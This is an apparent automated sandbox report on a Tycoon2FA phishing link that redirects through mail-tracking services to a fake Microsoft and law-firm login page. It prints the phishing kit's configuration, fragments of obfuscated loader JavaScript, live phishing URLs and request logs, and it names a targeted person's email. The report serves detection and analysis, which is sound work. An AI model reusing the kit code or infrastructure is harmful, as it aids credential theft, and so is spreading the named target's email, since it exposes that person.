Windows Analysis Report
https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6

Overview

General Information

Sample URL: https://u17065553.ct.sendgrid.net/ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHO
Analysis ID: 1640820

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Found malware configuration
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

AV Detection

Source: 3.18.d.script.csv Malware Configuration Extractor: Tycoon2FA {"otherweburl": "", "websitenames": "[\"godaddy\", \"okta\"]", "bes": "[\"Apple.com\",\"Netflix.com\"]", "pes": "[\"https:\\/\\/t.me\\/\",\"https:\\/\\/t.com\\/\",\"t.me\\/\",\"https:\\/\\/t.me.com\\/\",\"t.me.com\\/\",\"t.me@\",\"https:\\/\\/t.me@\",\"https:\\/\\/t.me\",\"https:\\/\\/t.com\",\"t.me\",\"https:\\/\\/t.me.com\",\"t.me.com\",\"t.me\\/@\",\"https:\\/\\/t.me\\/@\",\"https:\\/\\/t.me@\\/\",\"t.me@\\/\",\"https:\\/\\/www.telegram.me\\/\",\"https:\\/\\/www.telegram.me\"]", "capnum": "1", "appnum": "1", "pvn": "0", "view": "", "pagelinkval": "eqTMS", "emailcheck": "dcabral@pierceatwood.com", "webname": "rtrim(/web8/, '/')", "urlo": "/rvBXzyX4Qq50i8TvtNXs8BpqNqxHqx6mzSSKcXalR4B6PLT8k9y"}

Phishing

Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC Joe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is a well-known global technology company., The URL 'rft.naturdon.com' does not match the legitimate domain 'microsoft.com'., The domain 'naturdon.com' is not associated with Microsoft and appears unrelated., The presence of a subdomain 'rft' does not align with typical Microsoft subdomains., The email domain 'pierceatwood.com' is unrelated to Microsoft, suggesting potential phishing., The URL structure and domain name do not reflect any known Microsoft services or products. DOM: 3.4.pages.csv
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC Joe Sandbox AI: Score: 9 Reasons: The brand 'Pierce Atwood' is a known law firm with a legitimate domain likely being 'pierceatwood.com'., The URL 'rft.naturdon.com' does not match the legitimate domain of Pierce Atwood., The domain 'naturdon.com' does not have any known association with Pierce Atwood., The presence of a password input field to access office mail is suspicious, especially on an unrelated domain., The URL structure with 'rft' as a subdomain and 'naturdon.com' as the main domain is unusual and not associated with the brand. DOM: 3.6.pages.csv
Source: Yara match File source: 3.5.pages.csv, type: HTML
Source: Yara match File source: 3.4.pages.csv, type: HTML
Source: Yara match File source: 3.6.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML
Source: Yara match File source: 2.3.d.script.csv, type: HTML
Source: Yara match File source: 2.2.pages.csv, type: HTML
Source: Yara match File source: 2.1.pages.csv, type: HTML
Source: Yara match File source: 3.21..script.csv, type: HTML
Source: Yara match File source: dropped/chromecache_123, type: DROPPED
Source: Yara match File source: 3.18.d.script.csv, type: HTML
Source: Yara match File source: 2.4.d.script.csv, type: HTML
Source: Yara match File source: 2.11.d.script.csv, type: HTML
Source: Yara match File source: 3.13..script.csv, type: HTML
Source: Yara match File source: 3.14..script.csv, type: HTML
Source: Yara match File source: 2.8..script.csv, type: HTML
Source: 2.4.d.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, blocking keyboard shortcuts and right-click functionality, and redirecting the user to an external website (eBay) after a delay. These behaviors are highly suspicious and indicate potential malicious intent, such as preventing the user from interacting with the page or redirecting them to a phishing site.
Source: 2.11.d.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts and right-click functionality, and implementing a mechanism to detect and redirect the user to an external website (Google.com) upon detecting a debugger being attached. These behaviors are highly suspicious and indicative of malicious intent, likely attempting to evade detection and analysis.
Source: 2.10..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://rft.naturdon.com/iVYo/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code, the presence of anti-debugging techniques, and the overall malicious intent make this a high-risk script.
Source: 2.3.d.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates high-risk behaviors, including dynamic code execution through the use of `eval()` and potential data exfiltration. The obfuscated code and use of proxy objects further increase the risk. Overall, this script exhibits a high level of malicious intent and should be treated with caution.
Source: 2.2..script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://rft.naturdon.com/iVYo/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob` and `decodeURIComponent` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Number of links: 0
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://rft.naturdon.com/iVYo/#Ddcabral@pierceatwood.com HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>AI UI Template</title> <style> body { font-family: 'Segoe UI', Tahoma, Geneva,...
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Title: Authenticate For Security does not match URL
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Terms of use
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: Invalid link: Privacy & cookies
Source: https://rft.naturdon.com/iVYo/ HTTP Parser: function kcadliwhay(){uebpspmcnq = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagica8bwv0ysbjagfyc2v0psjvveytoci+ciagica8bwv0ysbuyw1lpsj2awv3cg9ydcigy29udgvudd0id2lkdgg9zgv2awnllxdpzhrolcbpbml0awfslxnjywxlpteumci+ciagica8dgl0bgu+r3jhcghpyybdyxjkifdlyibuzw1wbgf0ztwvdgl0bgu+ciagica8c3r5bgu+ciagicagicagym9kesb7ciagicagicagicagigzvbnqtzmftawx5oiantw9udhnlcnjhdccsihnhbnmtc2vyawy7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmxytfhmmu7ciagicagicagicagignvbg9yoiajztblmguwowogicagicagicagicbtyxjnaw46ida7ciagicagicagicagihbhzgrpbmc6ida7ciagicagicagicagigxpbmutagvpz2h0oiaxljy7ciagicagicagfqogicagicagighlywrlcib7ciagicagicagicagigjhy2tncm91bmqty29sb3i6icmxnjixm2u7ciagicagicagicagihbhzgrpbmc6idmwchg7ciagicagicagicagihrlehqtywxpz246ignlbnrlcjskicagicagicagicagym9yzgvylwjvdhrvbtogm3b4ihnvbglkicnlotq1nja7ciagicagicagfqogicagicagighlywrlcibomsb7ciagicagicagicagig1hcmdpbjogmdskicagicagicagicagzm9udc1zaxploia0mnb4owogicagicagicagicbjb2xvcjogi2u5ndu2mdskicagicagicagicagdgv4dc10cmfuc2zvcm06ihvwcgvyy2fzztskicagicagi...
Source: anonymous function HTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "eqtms";var emailcheck = "dcabral@pierceatwood.com";var webname = "rtrim(/web8/, '/')";var urlo = "/rvbxzyx4qq50i8tvtnxs8bpqnqxhqx6mzsskcxalr4b6plt8k9y";var gdf = "/ghqz0xkg5s1z1tyocpd0q3ygfsdyyzyndyfpxu4wavlbbq0ab117";var odf = "/gh03dkidmn49qvryzakk8jngnrxcd645";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;if(useragent.matc...
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: <input type="password" .../> found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No favicon
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="author".. found
Source: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYC HTTP Parser: No <meta name="copyright".. found
Source: global traffic TCP traffic: 192.168.2.4:63369 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exe HTTP traffic: Redirect from: u17065553.ct.sendgrid.net to https://app.salesforceiq.com/r?target=603feeba78af1c08f5743ad0&t=afwhzf0ambvhyfm9rctktaa9k2lfirndsus7iryke1td_g46ivu2nabpy5st0sm4yvyv9nje6hj_akhagab2q-vekjszzwprhws5qxj8pkn-xa_5zkvzhw1vuxoximx7iypi_hkyjtnb&url=https://registrosaraquari.com.br/g63f/614583/pierceatwood/?nl=zgnhynjhbebwawvyy2vhdhdvb2quy29t
Source: global traffic HTTP traffic detected: GET /ls/click?upn=u001.Rw-2FXpvWBRDxNoiEvv-2B0VhMl349dE-2BIxYKCLpL5-2B-2FL8px39hmRTYxAZ-2BeMH1CR7jYvsg3f7mQR-2BtgzEdpv6rWDyoEa1Isq60WafIaat9IMqfozrbRuGiDhSD5zRfw1vSUnaPfHOkeKVWyjmgPghsIl-2FnSiz3vjd-2BgNdZNW1WWi7RlhTni8jQbV4O1UkQOa0-2F2VYGlXOPUclqMwRi50Vl1PR4j2jhVrjOnUdA6E03jJF3YxTMCgxElFH-2Bjnu2oS6ZdGJGXf9TKr37Eh3pnVym0G5ilxnSN6bJyz-2FWbi47cL6vQDH-2FLX6HDdsxLQr4OiWNyplfwZIjGldJH3Oj3k-2B0Sr92pyHOs07I3QG9CN9BFC52s0blv8XoiBzACqb7MDZTgdhgx-2Fj3fdHjRUqn0E0aUxawEH-2F-2B7SQiAWk4bi4jHEXI-3DlKA5_AMa9RrBWZfrIG11ZEW0ArF1BRI9e8rcrPZr5T9DlZ7Ba2ZAvuJPwiS8cX4aFrXjFerUDwGcfFdNk6Ly7G30W-2FpJZ3vwwQM6aCBocvejnros7-2FYckwVQH02a6C13hCOZXCH6DxRozn9HOBenC-2BdqPCIwBV1vvkSKYyJjB4wo2MVyi5b4Ko6F9xhTiwowhGgTSo1JEnvhUu4BAFpCuBdmsFw-3D-3D HTTP/1.1Host: u17065553.ct.sendgrid.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /r?target=603feeba78af1c08f5743ad0&t=AFwhZf0amBvhYfM9RctKtaa9k2LfIrNDSUS7iRYke1td_G46ivu2nAbPY5ST0sm4YvyV9nje6hJ_AkhaGAB2Q-VekJszZwpRHWS5Qxj8Pkn-XA_5zkvZHw1vuXoxIMX7IYPI_hkyjtNB&url=https://registrosaraquari.com.br/g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t HTTP/1.1Host: app.salesforceiq.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t HTTP/1.1Host: registrosaraquari.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /0/index.xml?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29t HTTP/1.1Host: registrosaraquari.com.brConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://registrosaraquari.com.br/g63f/614583/Pierceatwood/?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /0/index.xslt HTTP/1.1Host: registrosaraquari.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: xsltReferer: https://registrosaraquari.com.br/0/index.xml?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: registrosaraquari.com.brConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://registrosaraquari.com.br/0/index.xml?nl=ZGNhYnJhbEBwaWVyY2VhdHdvb2QuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /efueBIf7KMBbXW0qQF2zeji3jy0JijcyRqJUUwcvNTCnOUKvkR78143 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /klZUXgOlh2u3Z2ys2P7suUE8OPsvE6D0NZcY24FlEVoyLh1rlCu0zJMqOpqgPM0t8xKY93rEWKezYEZUkbXH3MBDHfCQeW7aWFIDvpz4vU3PIiYP2CoSTMqCoZvmlMmOzASNryz660 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /klVMx7KVI7aqSsO73T4YmMDJiwpgOXnjl0kvOhd3fZAopRdu3RNdl8MlVtw7oEWHHR2t8JGp85UDgXLK6yz230 HTTP/1.1Host: rft.naturdon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im80ZGFWdjdPWExiR1Nrd3ZKUlNydnc9PSIsInZhbHVlIjoiSXRBeTcram15SHZuVFV1a1pZTGZBVm5rZ1BtMy9TYThoUG8vUnVYQkRZREx3ZFYvQVJrYzJHajk1WHh2Y2dnblo3Wnh2djU1c3lRVFdPbndJOW5HMGZnSlRiS3JXT1FJVit6SXl2eU54aHhjMklzWDZpM3ByRTFNMlh3bURxWUsiLCJtYWMiOiJkODkzNTkzZmNkOTc4ODExMGVjYjhmYzVkNWE0NzU0MGQ0MGU4MGQyOGM4MDBkZjQwMmY2ZTQ5MzEyNzk0OTk3IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ijQ0IOXUR1aIdE2dIax8V9VT5mgSv8B3wxiSY8D4KNzfk5az6fKC4B8vvw56170 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkE2TmpJMkh6bFZQbkJORVNMb0I0M3c9PSIsInZhbHVlIjoiRkRNbW9xSkk5TVFDV3JSRzBrZlJ5bUg1aS9wV0VWNUJ2ZWsrNGxDcjNXRXZiMVkxL2hWK1hHYndTc2xEZzc1aEZTbnIwOWpRUk9VYnRBSUoxSVBMWEZCYXVqZGJNMys1c0xidWwxaW5mbGJ3b0VuNXZqY0JBTGUvaGNOMHpzMzEiLCJtYWMiOiIwYTNkZDBhMTQ5MTM3NGM1ZWRkNjQzNzI0OTNiNDkzN2E2NjllOWQ1NTU1NWZkZWMxM2U1MjdjY2U0Njk5ZjRjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ims2ZnpTbDM1aXoyZmI1TGJieEpUaEE9PSIsInZhbHVlIjoiMFJxMzdKcWlWNmtaNnpqVWw4MWhybkpMOGx5dkIzM3JsNnYxWU5BOUpObjNZa2o4ZWVpL1hmQTZOMHh0SjhKeVhzSjVFK2ZYcnh4NzY2NGN4TXcrQWp0OUNTbEd2Tmdmc1FRdmtES0Z3SWFPVlh3VGdZTUZOSmlPQ00wTTNDMWwiLCJtYWMiOiI3ZDIwMmMyNGI1ZWYxZDU4Y2U4MzU2MDY0OGYzM2MxM2Y4YmUxZGY5MTllZjUxNmI1MWZmYmFjODM3YzI0OWY4IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzUMXXAK9cdiVG7unTSOjXlhW72wM8rZJ7uRvQrQmnp9mH4LntaZDifn490180 HTTP/1.1Host: rft.naturdon.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rft.naturdon.com/LFDIOVBACHUVLUMXWJMZZABIlktsueapchiibtoelfaoxbibelpkiiruq3hyt0s7ajwv4pmysqg1cwnj?LPJSZHQGFSSFRQTYJOJFCDJWWCYCAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpWdm1KNGZUL3lYZDQvZlljRVdqWUE9PSIsInZhbHVlIjoicDhzVklsUFVkMU9SaXVHTmQxRGlhRmJ4S0cwWE55RlJSTnRLditUdm0yZU1uQUVLMHpyMFNncnBlYXVCUmtabXVOYmF0QXBUaG0vZStOUWRSSHNUZmlDd2FQNjlvWXE4cWlrVEg2NHFBRTRSMmRzeDU3NE84aXYzdWFjOGhBY2IiLCJtYWMiOiI5Yzk3NjczM2ZjNDljNzViM2JiNjczNTgxZTlkZDY2ZmViYWFkYzljZWVkZTAwNjY0YTk1NmU2Yjc3ZmJhOGZiIiwidGFnIjoiIn0%3D; 